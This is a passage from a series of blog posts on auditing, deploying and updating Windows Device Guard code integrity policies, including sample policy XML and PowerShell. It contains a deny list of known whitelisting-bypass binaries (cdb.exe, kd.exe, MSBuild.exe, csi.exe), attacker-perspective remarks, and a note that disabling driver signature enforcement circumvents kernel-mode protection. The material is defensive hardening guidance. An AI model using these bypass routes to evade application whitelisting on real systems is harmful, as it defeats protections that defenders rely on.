  Name: Microsoft Code Signing PCA 2010
  TBS: 121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195
- ID_SIGNER_S_2E0_0_0_0_0_0_0_0
  Name: VeriSign Class 3 Code Signing 2010 CA
  TBS: 4843A82ED3B1F2BFBEE9671960E1940C942F688D
- ID_SIGNER_S_34C_0_0_0_0_0_0_0
  Name: Microsoft Code Signing PCA
  TBS: 27543A3F7612DE2261C7228321722402F63A07DE
- ID_SIGNER_S_34F_0_0_0_0_0_0_0
  Name: Microsoft Code Signing PCA 2011
  TBS: F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E
- ID_SIGNER_S_37B_0_0_0_0_0_0_0
  Name: Microsoft Root Certificate Authority
  TBS: 391BE92883D52509155BFEAE27B9BD340170B76B
- ID_SIGNER_S_485_0_0_0_0_0_0_0
  Name: Microsoft Windows Verification PCA
  TBS: 265E5C02BDC19AA5394C2C3041FC2BD59774F918

TBS description:

The "Name" attribute is derived from the CN of the certificate. Ultimately, Device Guard doesn't validate the CN. In fact, the "Name" attribute is not present in a binary CI policy (i.e. SIPolicy.p7b). Rather, it validates the TBS (ToBeSigned) hash which is basically a hash of the certificate as dictated by the signature algorithm in the certificate (MD5, SHA1, SHA256, SHA384, SHA512). You can infer the hash algorithm used based on the length of the hash. If you're interested to learn how the hash is calculated, I recommend you load Microsoft.Config.CI.Commands.dll in a decompiler and inspect the Microsoft.SecureBoot.UserConfig.Helper.CalculateTBS method.

Signer hashing algorithms used:

SHA1:
 * Intel External Basic Policy CA
 * VeriSign Class 3 Code Signing 2010 CA
 * Microsoft Code Signing PCA
 * Microsoft Root Certificate Authority
 * Microsoft Windows Verification PCA

Note: Microsoft advises against using a SHA1 signature algorithm and is phasing the algorithm out for certificates. See https://aka.ms/sha1. It is likely within the realm of possibility that a non-state actor could generate a certificate with a SHA1 hash collision.

SHA256:
 * Microsoft Windows Production PCA 2011
 * Microsoft Windows Third Party Component CA 2012
 * Microsoft Code Signing PCA 2010
 * Microsoft Code Signing PCA 2011

SHA384:
 * COMODO RSA Certification Authority

Analysis/recommendations: Driver rules


Overall, I would say the the driver rules may be overly permissive. First of all, any driver signed with any of those certificates would be permitted to be loaded.  For example, I would imagine that most, if not all Intel drivers are signed with the same certificate. So, if there was a driver in particular that was vulnerable that had no business on your system, it could be loaded and exploited to gain unsigned kernel code execution. My recommendation for third party driver certificates is that you whitelist each individual required third party driver using the FilePublisher or preferably the WHQLFilePublisher (if the driver happens to be WHQL signed) file rule level. An added benefit of the FilePublisher rule is that the whitelisted driver will only load if the file version is equal or greater than what is specified. This means that if there is an older, known vulnerable version of the driver you need, the old version will not be authorized to load.

Another potential issue that I could speculatively anticipate is with the "Microsoft Windows Third Party Component CA 2012" certificate. My understanding is that this certificate is used for Microsoft to co-sign 3rd party software. Because this certificate seems to be used so heavily by 3rd party vendors, it potentially opens the door to permit a large amount vulnerable software. To mitigate this, you can use the WHQLPublisher or WHQLFilePublisher rule level when creating a code integrity policy. When those options are selected, if an OEM vendor name is associated with a drivers, a CertOemId attribute will be applied to signers. For example, you could use this feature to whitelist only Apple drivers that are cosigned with the "Microsoft Windows Third Party Component CA 2012" certificate.

ID_SIGNINGSCENARIO_WINDOWS


The following user-mode code signers are whitelisted (based on their presence in AllowedSigners):

- ID_SIGNER_S_1_1_0_0_0_0_0_0
   Name: Microsoft Windows Production PCA 2011
   TBS: 4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146
- ID_SIGNER_S_1_1_0
   Name: Intel External Basic Policy CA
   TBS: 53B052BA209C525233293274854B264BC0F68B73
   CertPublisher: Intel(R) Intel_ICG
- ID_SIGNER_S_2_1_0
   Name: Microsoft Windows Third Party Component CA 2012
   TBS: CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46
- ID_SIGNER_S_4_1_0_0_0
   Name: Matthew Graeber
   TBS: B1554C5EEF15063880BB76B347F2215CDB5BBEFA1A0EBD8D8F216B6B93E8906A
- ID_SIGNER_S_19_1_0
   Name: Intel External Basic Policy CA
   TBS: 53B052BA209C525233293274854B264BC0F68B73
   CertPublisher: Intel(R) pGFX
- ID_SIGNER_S_20_1_0
   Name: iKGF_AZSKGFDCS
   TBS: 32656594870EFFE75251652A99B906EDB92D6BB0
   CertPublisher: IntelVPGSigning2016
- ID_SIGNER_S_4E_1_0
   Name: Microsoft Windows Third Party Component CA 2012
   TBS: CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46
- ID_SIGNER_S_65_1_0
   Name: VeriSign Class 3 Code Signing 2010 CA
   TBS: 4843A82ED3B1F2BFBEE9671960E1940C942F688D
   CertPublisher: Logitech
- ID_SIGNER_S_35C_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA
   TBS: 27543A3F7612DE2261C7228321722402F63A07DE
- ID_SIGNER_S_35F_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA 2011
   TBS: F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E
- ID_SIGNER_S_1EA5_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA 2010
   TBS: 121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195
- ID_SIGNER_S_2316_1_0_0_0_0_0_0
   Name: Microsoft Windows Verification PCA
   TBS: 265E5C02BDC19AA5394C2C3041FC2BD59774F918
- ID_SIGNER_S_3D8C_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA
   TBS: 7251ADC0F732CF409EE462E335BB99544F2DD40F

The following user-mode code blacklist rules are present (based on their presence inDeniedSigners):

- ID_SIGNER_F_1_0_0_1_0_0
   Name: Microsoft Code Signing PCA
   TBS: 27543A3F7612DE2261C7228321722402F63A07DE
   CertPublisher: Microsoft Corporation
   Associated files:
     1) OriginalFileName: cdb.exe
        MinimumFileVersion: 99.0.0.0
     2) OriginalFileName: kd.exe
        MinimumFileVersion: 99.0.0.0
     3) OriginalFileName: windbg.exe
        MinimumFileVersion: 99.0.0.0
     4) OriginalFileName: MSBuild.exe
        MinimumFileVersion: 99.0.0.0
- ID_SIGNER_F_2_0_0_1_0_0
   Name: Microsoft Code Signing PCA 2010
   TBS: 121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195
   CertPublisher: Microsoft Corporation
   Associated files:
     1) OriginalFileName: cdb.exe
        MinimumFileVersion: 99.0.0.0
     2) OriginalFileName: kd.exe
        MinimumFileVersion: 99.0.0.0
     3) OriginalFileName: windbg.exe
        MinimumFileVersion: 99.0.0.0
- ID_SIGNER_F_3_0_0_1_0_0
   Name: Microsoft Code Signing PCA 2011
   TBS: F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E
   CertPublisher: Microsoft Corporation
   Associated files:
     1) OriginalFileName: MSBuild.exe
        MinimumFileVersion: 99.0.0.0
     2) OriginalFileName: csi.exe
        MinimumFileVersion: 99.0.0.0
- ID_SIGNER_F_4_0_0_1_0_0
   Name: Microsoft Windows Production PCA 2011
   TBS: 4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146
   CertPublisher: Microsoft Windows
   Associated files:
     1) OriginalFileName: MSBuild.exe
        MinimumFileVersion: 99.0.0.0

Analysis/recommendations: User-mode rules

Whoever created this policy is clearly mindful of and actively blocking known UMCI bypasses. The downside is that there have since been additional bypasses reported publicly - e.g. dnx.exe from Matt Nelson (@enigma0x3). As a defender employing application whitelisting solutions, it is critical to stay up to date on current bypasses. If not, you're potentially one trusted binary/script away from further compromise.

You may have noticed what seems like an arbitrary selection of "99.0.0.0" for the minimum file version. You can interpret this as any of the files with matching block rules that have a version number less than 99.0.0.0 will be blocked. It is fairly reasonable to assume that a binary won't exceed version 99.0.0.0 but I've recently seen several files in the hundreds so I now recommend setting MinimumFileVersion for each FilePublisher block rule to 999.999.999.999. Unfortunately, at the time of writing, you cannot block an executable by only its signature and OriginalFileName. I hope this will change in the future.

As for the whitelisted signers, I wouldn't have a ton to recommend. As an attacker though, I might try to find executables/scripts signed with the "Matthew Graeber" certificate. This sounds like it would be an easy thing to do but Microsoft actually does not provide an official means of associating an executable or script to a CI policy rule. Ideally, Microsoft would provide a Test-CIPolicy cmdlet similar to the Test-AppLockerPolicy cmdlet. I'm in the process of writing one now.

Overall, there are no signers that stick out to me as worthy of additional investigation. Obviously, Microsoft signers will need to be permitted (and in a non-restrictive) fashion if OS updates are to be accepted. It appears as thought there is some required Intel software present on the system. If anything, I might try to determine why the Intel software is required.


UpdatePolicySigners analysis

There is only a single UpdatePolicySigner: "Matthew Graeber". So while the effort was made to permit that code signing certificate to sign the policy, the "Enabled:Unsigned System Integrity Policy" policy rule was still set. So considering the intent to sign the policy was there, I would certainly recommend that the "Enabled:Unsigned System Integrity Policy" rule be removed and to start enforcing signed policies. As an attacker, I would also look for the presence of this code signing certificate on the same system. It should go without saying that a whitelisted code signing certificate should never be present on a Device Guard-enabled system that whitelists that certificate.

HvciOptions analysis

HvciOptions is set to "1" indicating that it is enabled and that the system will benefit from additional kernel exploitation protections. I cannot recommend setting HVCI to strict mode (3) yet as it is almost certain that there will be some drivers that are not compliant for strict mode.

Conclusion

I'll state again that this analysis has been subjective. An effective policy on one system that has a particular purpose likely won't be effective on another piece of hardware with a separate purpose. Getting CI policy configuration "right" is indeed a challenge. It takes experience, knowledge of the CI policy schema, and it requires that you apply an attackers mindset when auditing a policy.

It is worth noting that even despite having an extremely locked down policy, the OS is still at the mercy of UMCI bypasses. For this very reason, Device Guard should be merely a component of a layered defense. It is certainly recommended that anti-malware solutions be installed side by side with Device Guard. For example, in a post-exploitation scenario, Device Guard will do nothing about the exfiltration of sensitive data using a simple batch script or PowerShell script operating in constrained language mode.

I will leave the comments section open to encourage discussion about your thoughts on CI policy assessment and how you think this example policy might have additional vulnerabilities. I feel as though I'm breaking new ground here since there is no other information available regarding Device Guard policy audit methodology so I am certainly open to candid feedback.

On the Effectiveness of Device Guard User Mode Code Integrity

$
0
0
Is a security feature with known bypasses pointless?

I felt compelled to answer to this question after seeing several tweets recently claiming that Device Guard User Mode Code Integrity (UMCI) is a pointless security mechanism considering all of the recently reported bypasses. Before specifically diving into UMCI and its merits (or lack thereof), let’s use an analogy in the physical world to put things into perspective - a door.

Consider the door at the front of your home or business. This door helps serve as the primary mechanism to prevent intruders from breaking, entering, and stealing your assets. Let's say it's a solid wood door for the sake of the analogy. How might an attacker go about bypassing it?

  • They could pick the lock
  • They could compromise the latch with a shimming device
  • They could chop the door down with an ax
  • They could compromise the door and the hinges with a battering ram

Now, there are certainly better doors out there. You could purchase a blast door and have it be monitored with a 24/7 armed guard. Is that measure realistic? Maybe. It depends on the value of the assets you want to protect. Realistically, it's probably not worth your money since you suspect that a full frontal assault of enemy tanks is not a part of your threat model.

Does a determined attacker ultimately view the door as a means of preventing them from gaining access to your valuable assets? Of course not. Does the attacker even need to bypass the door? Probably not. They could also:

  • Go through the window
  • Break through a wall
  • Hide in the store during business hours and wait for everyone to leave
  • Submit their resume, get a job, develop trust, and slowly, surreptitiously steal your assets

So, will a door prevent breaches in all cases? Absolutely not. Will it prevent or deter an attacker lacking a certain amount of skill from breaking and entering? Sure. Other than preventing the elements from entering your store, does the locked door serve a purpose? Of course. It is a preventative mechanism suitable for the threat model that you choose to accept or mitigate against. The door is a baseline preventative mechanism employed in conjunction with a layered defense consisting of other preventative (reinforced, locked windows) and detective (motion sensors, video cameras, etc.) measures.




Now let's get back to the comfortable world of computers. Is a preventative security technology completely pointless if there are known bypasses? Specifically, let’s focus on Device Guard user mode code integrity (UMCI) as it’s received a fair amount of attention as of late. Considering all of the public bypasses posted, does it still serve a purpose? I won't answer that question using absolutes. Let me make a few proposals and let you, the reader decide. Consider the following:

1) A bypass that applies to Device Guard UMCI is extremely likely to apply to all application whitelisting solutions. I would argue that Device Guard UMCI goes above and beyond other offerings. For example, UMCI places PowerShell (one of the largest user-mode attack surfaces) into constrained language mode, preventing PowerShell from being used to execute arbitrary, unsigned code. Other whitelisting solutions don’t even consider the attack surface posed by PowerShell. Device Guard UMCI also applies code integrity rules to DLLs. There is no way around this. Other solutions allow for DLL whitelisting but not by default.

2) Device Guard UMCI, as with any whitelisting solution, is extremely effective against post-exploitation activities that are not aware of UMCI bypasses. The sheer amount of attacks that app-whitelisting prevents without any fancy machine learning is astonishing. I can say first hand that every piece of “APT” malware I reversed in a previous gig would almost always drop an unsigned binary to disk. Even in the cases where PowerShell was used, .NET methods were used heavily - something that constrained language mode would have outright prevented.

3) The majority of the "misplaced trust" binaries (e.g. MSBuild.exe, cdb.exe, dnx.exe, rcsi.exe, etc.) can be blocked with Device Guard code integrity policy updates. Will there be more bypass binaries? Of course. Again, these binaries will also likely circumvent all app-whitelisting solutions as well. Does it require an active effort to stay on top of all the bypasses as a defender? Yes. Deal with it.

Now, I along with awesome people like Casey Smith (@subtee) and Matt Nelson (@enigma0x3) have reported our share of UMCI bypasses to Microsoft for which there is no code integrity policy mitigation. We have been in the trenches and have seen first hand just how bad some of the bypasses are. We are desperately holding out hope that Microsoft will come through, issue CVEs, and apply fixes for all of the issues we’ve reported. If they do, that will set a precedent and serve as proof that they are taking UMCI seriously. If not, I will start to empathize a bit more with those who claim that Device Guard is pointless. After all, we’re starting to see more attackers “live off the land” and leverage built-in tools to host their malware. Vendors need to be taking that seriously.

Ultimately, Device Guard UMCI is just another security feature that a defender should consider from a cost/benefit analysis based on threats faced and the assets they need to defend. It will always be vulnerable to bypasses, but raises the baseline bar of security. Going back to the analogy above, a door can always be bypassed but you should be able to detect an attacker breaking in and laying their hands on your valuable assets. So obviously, you would want to use additional security solutions along with Device Guard - e.g. Windows Event Forwarding, an anti-malware solution, and to perform periodic compromise/hunt assessments.

What I’m about to say might be scandalous but I sincerely think that application whitelisting should the new norm. You probably won’t encounter any organizations that don’t employ an anti-malware solution despite the innumerable bypasses. These days, anti-malware solutions are assumed to be a security baseline as I think whitelisting should be despite the innumerable bypasses that will surface over time. Personally, I would ask any defender to seriously consider it and I would encourage all defenders to hold whitelisting solution vendors' feet to the fire and hold them accountable when there are bypasses for which there is no obvious mitigation.


I look forward to your comments here or in a lively debate on Twitter!

Code Integrity on Nano Server: Tips/Gotchas

$
0
0
Although it's not explicitly called out as being supported in Microsoft documentation, it turns out that you can deploy a code integrity policy to Nano Server, enabling enforcement of user and kernel-mode code integrity. It is refreshing to know that code integrity is supported across all modern Windows operating systems now (Win 10 Enterprise, Win 10 IoT, and Server 2016 including Nano Server) despite the fact that Microsoft doesn't make that fact well known. Now, while it is possible to enforce code integrity on Nano Server, you should be aware of some of the caveats which I intend to enumerate in this post.

Code Integrity != Device Guard

Do note that until now, there has been no mention of Device Guard. This was intentional. Nano Server does not support Device Guard - only code integrity (CI), a subset of the supported Device Guard features. So what's the difference you ask?

  • There are no ConfigCI cmdlets. These cmdlets are what allow you to build code integrity policies. I'm not going to try to speculate around the rationale for not including them in Nano Server but I doubt you will ever see them. In order to build a policy, you will need to build it from a system that does have the ConfigCI cmdlets.
  • Because there are no ConfigCI cmdlets, you cannot use the -Audit parameter of Get-SystemDriver and New-CIPolicy to build a policy based on blocked binaries in the Microsoft-Windows-CodeIntegrity/Operational event log. If you want to do this (an extremely realistic scenario), you have to get comfortable pulling out and parsing blocked binary paths yourself using Get-WinEvent. When calling Get-WinEvent, you'll want to do so from an interactive PSSession rather than calling it from Invoke-Command. By default, event log properties don't get serialized and you need to access the properties to pull out file paths.
  • In order to scan files and parse Authenticode and catalog signatures, you will need to either copy the target files from a PSSession (i.e. Copy-Item -FromSession) or mount Nano Server partitions as a file share. You will need to do the same thing with the CatRoot directory - C:\Windows\System32\CatRoot. Fortunately, Get-SystemDriver and New-CIPolicy support explicit paths using the -ScanPath and -PathToCatroot parameters. It may not be obvious, but you have to build your rules off the Nano Server catalog signers, not some other system because your other system is unlikely to contain the hashes of binaries present on Nano Server.
  • There is no Device Guard WMI provider (ROOT\Microsoft\Windows\DeviceGuard). Without this WMI class, it is difficult to audit code integrity enforcement status at scale remotely.
  • There is no Microsoft-Windows-DeviceGuard/Operational event log so there is no log to indicate when a new CI policy was deployed. This event log is useful for alerting a defender to code integrity policy and virtualization-based security (VBS) configuration tampering.
  • Since Nano Server does not have Group Policy, there is no way to configure a centralized CI policy path, VBS settings, or Credential Guard settings. I still need to dig in further to see if any of these features are even supported in Nano Server. For example, I would really want Nano Server to support UEFI CI policy protection.
  • PowerShell is not placed into constrained language mode even with user-mode code integrity (UMCI) enforcement enabled. Despite PowerShell running on .NET Core, you still have a rich reflection API to interface with Win32 - i.e. gain arbitrary unsigned code execution. With PowerShell not in constrained language mode (it's in FullLanguage mode), this means that signature validation won't be enforced on your scripts. I tried turning on constrained language mode by setting the __PSLockdownPolicy system environment variable, but PowerShell Core doesn't seem to acknowledge it. Signature enforcement of scripts/modules in PowerShell is independent of Just Enough Administration (JEA) but you should also definitely consider using JEA in Nano Server to enforce locked down remote session configurations.

Well then what is supported on Nano Server? Not all is lost. You still get the following:

  • The Microsoft-Windows-CodeIntegrity/Operational event log so you can view which binaries were blocked per code policy.
  • You still deploy SIPolicy.p7b to C:\Windows\System32\CodeIntegrity. When SIPolicy.p7b is present in that directory, Nano Server will begin enforcing the rules after a reboot.

Configuration/deployment/debugging tips/tricks

I wanted to share with you the way in which I dealt with some of the headaches involved in configuring, deploying, and debugging issues associated with code integrity on Nano Server.

Event log parsing

Since you don't get the -Audit parameter in the Get-SystemDriver and New-CIPolicy cmdlets, if you choose to base your policy off audit logs, you will need to pull out blocked binary paths yourself. When in audit mode, binaries that would have been blocked generate EID 3076 events. The path of the binary is populated via the second event parameter. The paths need to be normalized and converted to a proper file path from the raw device path. Here is some sample code that I used to obtain the paths of blocked binaries from the event log:

$BlockedBinaries=Get-WinEvent-LogName'Microsoft-Windows-CodeIntegrity/Operational'-FilterXPath'*[System[EventID=3076]]'|ForEach-Object{
    $UnnormalizedPath=$_.Properties[1].Value.ToLower()

    $NormalizedPath=$UnnormalizedPath

    if ($UnnormalizedPath.StartsWith('\device\harddiskvolume3')) {
        $NormalizedPath=$UnnormalizedPath.Replace('\device\harddiskvolume3','C:')
    } elseif ($UnnormalizedPath.StartsWith('system32')) {
        $NormalizedPath=$UnnormalizedPath.Replace('system32','C:\windows\system32')
    }

    $NormalizedPath
} |Sort-Object-Unique

Working through boot failures

There were times when the system often wouldn't boot because my kernel-mode rules were too strict when in enforcement mode. For example, when I neglected to add hal.dll to the whitelist, obviously, the OS wouldn't boot. While I worked through these problems, I would boot into the advanced boot options menu (by pressing F8) and disable driver signature enforcement for that session. This was an easy workaround to gain access to the system without having to boot from external WinPE media to redeploy a better, bootable CI policy. Note that the advanced boot menu is only made available to you if the "Enabled:Advanced Boot Options Menu" policy rule option is present in your CI policy. Obviously, disabling driver signature enforcement is a way to completely circumvent kernel-mode code integrity enforcement.

Completed code integrity policy

After going through many of the phases of an initial deny-all approach as described in my previous post on code integrity policy development, this is the relatively locked CI policy that I got to work on my Nano Server bare metal install (Intel NUC):

<?xmlversion="1.0"encoding="utf-8"?>
<SiPolicyxmlns="urn:schemas-microsoft-com:sipolicy">
  <VersionEx>1.0.0.0</VersionEx>
  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
  <Rules>
    <Rule>
      <Option>Enabled:Unsigned System Integrity Policy</Option>
    </Rule>
    <Rule>
      <Option>Enabled:Advanced Boot Options Menu</Option>
    </Rule>
    <Rule>
      <Option>Enabled:UMCI</Option>
    </Rule>
    <Rule>
      <Option>Disabled:Flight Signing</Option>
    </Rule>
  </Rules>
  <!--EKUS-->
  <EKUs/>
  <!--File Rules-->
  <FileRules>
    <!--This is the only non-OEM, 3rd party driver I needed for my Intel NUC-->
    <!--I was very specific with this driver rule but flexible with all other MS drivers.-->
    <FileAttribID="ID_FILEATTRIB_F_1"FriendlyName="e1d64x64.sys FileAttribute"FileName="e1d64x64.sys"MinimumFileVersion="12.15.22.3"/>
  </FileRules>
  <!--Signers-->
  <Signers>
    <SignerID="ID_SIGNER_F_1"Name="Intel External Basic Policy CA">
      <CertRootType="TBS"Value="53B052BA209C525233293274854B264BC0F68B73"/>
      <CertPublisherValue="Intel(R) INTELNPG1"/>
      <FileAttribRefRuleID="ID_FILEATTRIB_F_1"/>
    </Signer>
    <SignerID="ID_SIGNER_F_2"Name="Microsoft Windows Third Party Component CA 2012">
      <CertRootType="TBS"Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46"/>
      <CertPublisherValue="Microsoft Windows Hardware Compatibility Publisher"/>
      <FileAttribRefRuleID="ID_FILEATTRIB_F_1"/>
    </Signer>
    <SignerID="ID_SIGNER_S_3"Name="Microsoft Windows Production PCA 2011">
      <CertRootType="TBS"Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146"/>
      <CertPublisherValue="Microsoft Windows"/>
    </Signer>
    <SignerID="ID_SIGNER_S_4"Name="Microsoft Code Signing PCA">
      <CertRootType="TBS"Value="27543A3F7612DE2261C7228321722402F63A07DE"/>
      <CertPublisherValue="Microsoft Corporation"/>
    </Signer>
    <SignerID="ID_SIGNER_S_5"Name="Microsoft Code Signing PCA 2011">
      <CertRootType="TBS"Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E"/>
      <CertPublisherValue="Microsoft Corporation"/>
    </Signer>
    <SignerID="ID_SIGNER_S_6"Name="Microsoft Windows Production PCA 2011">
      <CertRootType="TBS"Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146"/>
      <CertPublisherValue="Microsoft Windows Publisher"/>
    </Signer>
    <SignerID="ID_SIGNER_S_2"Name="Microsoft Windows Production PCA 2011">
      <CertRootType="TBS"Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146"/>
      <CertPublisherValue="Microsoft Windows"/>
    </Signer>
    <SignerID="ID_SIGNER_S_1"Name="Microsoft Code Signing PCA 2010">
      <CertRootType="TBS"Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195"/>
    </Signer>
  </Signers>
  <!--Driver Signing Scenarios-->
  <SigningScenarios>
    <SigningScenarioValue="131"ID="ID_SIGNINGSCENARIO_DRIVERS_1"FriendlyName="Kernel-mode rules">
      <ProductSigners>
        <AllowedSigners>
          <AllowedSignerSignerId="ID_SIGNER_S_1"/>
          <AllowedSignerSignerId="ID_SIGNER_S_2"/>
          <AllowedSignerSignerId="ID_SIGNER_F_1"/>
          <AllowedSignerSignerId="ID_SIGNER_F_2"/>
        </AllowedSigners>
      </ProductSigners>
    </SigningScenario>
    <SigningScenarioValue="12"ID="ID_SIGNINGSCENARIO_WINDOWS"FriendlyName="User-mode rules">
      <ProductSigners>
        <AllowedSigners>
          <AllowedSignerSignerId="ID_SIGNER_S_3"/>
          <AllowedSignerSignerId="ID_SIGNER_S_4"/>
          <AllowedSignerSignerId="ID_SIGNER_S_5"/>
          <AllowedSignerSignerId="ID_SIGNER_S_6"/>
        </AllowedSigners>
      </ProductSigners>
    </SigningScenario>
  </SigningScenarios>
  <UpdatePolicySigners/>
  <CiSigners>
    <CiSignerSignerId="ID_SIGNER_S_3"/>
    <CiSignerSignerId="ID_SIGNER_S_4"/>
    <CiSignerSignerId="ID_SIGNER_S_5"/>
    <CiSignerSignerId="ID_SIGNER_S_6"/>
  </CiSigners>
  <HvciOptions>0</HvciOptions>
</SiPolicy

I conducted the following phases to generate this policy:
  1. Generate a default, deny-all policy by calling New-CIPolicy on an empty directory. I also increased the size of the Microsoft-Windows-CodeIntegrity/Operational to 20 MB to account for the large number of 3076 events I would expect while deploying the policy in audit mode. I also just focused on drivers for this phase so I didn't initially include the "Enabled:UMCI" option. My approach moving forward will be to focus on just drivers and then user-mode rules so as to minimize unnecessary cross-pollination between rule sets.
  2. Reboot and start pulling out blocked driver paths from the event log. I wanted to use the WHQLFilePublisher rule for the drivers but apparently, none of them were WHQL signed despite some of them certainly appearing to be WHQL signed. I didn't spend too much time diagnosing this issue since I have never been able to successfully get the WHQLFilePublisher rule to work. Instead, I resorted to the FilePublisher rule.
  3. After I felt confident that I had a good driver whitelist, I placed the policy into enforcement mode and rebooted. What resulted was nonstop boot failures. It turns out that if you're whitelisting individual drivers, critical drivers won't show up in the event log in audit mode like ntoskrnl.exe and hal.dll. So I explicitly added rules for them and Nano Server still wouldn't boot. What made things worse is that even if I placed the policy back into audit mode, there were no new blocked driver entries but the system still refused to boot. I rolled the dice and posited that there might be an issue with certificate chain validation at boot time so I created a PCACertificate rule for ntoskrnl.exe (The "Microsoft Code Signing PCA 2010" rule). This miraculously did the trick at the expense of creating a more permissive policy. In the end, I ended up with roughly the equivalent of a Publisher ruleset on my drivers with the exception of my Intel NIC driver.
  4. I explicitly made a FilePublisher rule for my Intel NIC driver as it was the only 3rd part, non-OEM driver I had to add when creating my Nano Server image. I don't need to allow any other code signed by Intel so I explicitly only allow that one driver.
  5. After I got Nano Server to boot, I started working on user-mode rules. This process was relatively straightforward and I used the Publisher rule for user-mode code.
  6. After using Nano Server under audit mode with my new rule set and not seeing any legitimate binaries that would have been blocked, I felt confident in the policy and placed it into audit mode and I haven't run into any issues and I'm using Nano Server as a Hyper-V server (i.e. with the "Compute" package).
I still need to get around to adding my code-signing certificate as an authorized policy signer, sign the policy, and remove "Enabled:Unsigned System Integrity Policy". Overall though, despite the driver issues, I'm fairly content with how well locked down my policy is. It essentially only allows a subset of critical Microsoft code to execute with the exception of the Intel driver which has a very specific file/signature-based rule.

Conclusion

I'm not sure if we'll see improved code integrity or Device Guard support for Nano Server in the future, but something is at least better than nothing. As it stands though, if you are worried about the execution of untrusted PowerShell code, unfortunately, UMCI does nothing to protect you on Nano Server. Code integrity still does a great job of blocking untrusted compiled binaries though - a hallmark of the vast majority of malware campaigns. Nano Server opens up a whole new world of possibilities from a management and malware perspective. I'm personally very interested to see how attackers will try to evolve and support their operations in a Nano Server environment. Fortunately, the combination of Windows Defender and code integrity support offer a solid security baseline.

Updating Device Guard Code Integrity Policies

$
0
0
In previous posts about Device Guard, I spent a lot of time talking about initial code integrity (CI) configurations and bypasses. What I haven't covered until now however is an extremely important topic: how does one effectively install software and update CI policies according? In this post, I will walk you through how I got Chrome installed on my Surface Book running on an enforced Device Guard code integrity policy.

The first questions I posed to myself were:
  1. Should I place my system into audit mode, install the software, and base an updated policy on CodeIntegrity event log entries?
  2. Or should I install the software on a separate, non Device Guard protected system, analyze the file footprint, develop a policy based on the installed files, deploy, and test?
My preference is option #2 as I would prefer to not place a system back into audit mode if I can avoid it. That said, audit mode would yield the most accurate results as it would tell you exactly which binaries would have been blocked that you would want to base whitelist rules off of. In this case, there's no right or wrong answer. My decision to go with option #2 was to base my rules solely off binaries that execute post-installation, not during installation. My mantra with whitelisting is to be as restrictive as is reasonable.

So how did I go about beginning to enumerate the file footprint of Chrome?
  1. I opened Chrome, ran it as I usually would, and used PowerShell to enumerate loaded modules.
  2. I also happened to know that the Google updater runs as a scheduled task so I wanted to obtain the binaries executed via scheduled tasks as well.
I executed the following to get a rough sense of where Chrome files were installed:

(Get-Process-Name*Chrome*).Modules.FileName |Sort-Object-Unique
(Get-ScheduledTask-TaskName*Google*).Actions.Execute |Sort-Object-Unique

To my surprise and satisfaction, Google manages to house nearly all of its binaries in C:\Program Files (x86)\Google. This allows for a great starting point for building Chrome whitelist rules.

Next, I had to ask myself the following:
  1. Am I okay with whitelisting anything signed by Google?
  2. Do I only want to whitelist Chrome? i.e. All Chrome-related EXEs and all DLLs they rely upon.
  3. I will probably want want Chrome to be able to update itself without Device Guard getting in the way, right?
While I like the idea of whitelisting just Chrome, there are going to be some potential pitfalls. By whitelisting just Chrome, I would need to be aware of every EXE and DLL that Chrome requires to function. I can certainly do that but it would be a relatively work-intensive effort. With that list, I would then create whitelist rules using the FilePublisher file rule level. This would be great initially and it would potentially be the most restrictive strategy while allowing Chrome to update itself. The issue is that what happens when Google decides to include one or more additional DLLs in the software installation? Device Guard will block them and I will be forced to update my policy again. I'm all about applying a paranoid mindset to my policy but at the end of the day, I need to get work done other than constantly updating CI policies.

So the whitelist strategy I choose in this instance is to allow code signed by Google and to allow Chrome to update itself. This strategy equates to using the "Publisher" file rule level - "a combination of the PcaCertificate level (typically one certificate below the root) and the common name (CN) of the leaf certificate. This rule level allows organizations to trust a certificate from a major CA (such as Symantec), but only if the leaf certificate is from a specific company (such as Intel, for device drivers)."

I like the "Publisher" file rule level because it offers the most flexibility, longevity for a specific vendor's code signing certificate. If you look at the certificate chain for chrome.exe, you will see that the issuing PCA (i.e. the issuer above the leaf certificate) is Symantec. Obviously, we wouldn't want to whitelist all code signed by certs issued by Symantec but I'm okay allowing code signed by Google who received their certificate from Symantec.

Certificate chain for chrome.exe
So now I'm ready to create the first draft of my code integrity rules for Chrome.

I always start by creating a FilePublisher rule set for the binaries I want to whitelist because it allows me to associate what binaries are tied to their respective certificates.

$GooglePEs=Get-SystemDriver-ScanPath'C:\Program Files (x86)\Google'-UserPEs
New-CIPolicy-FilePathGoogle_FilePub.xml-DriverFiles$GooglePEs-LevelFilePublisher-UserPEs

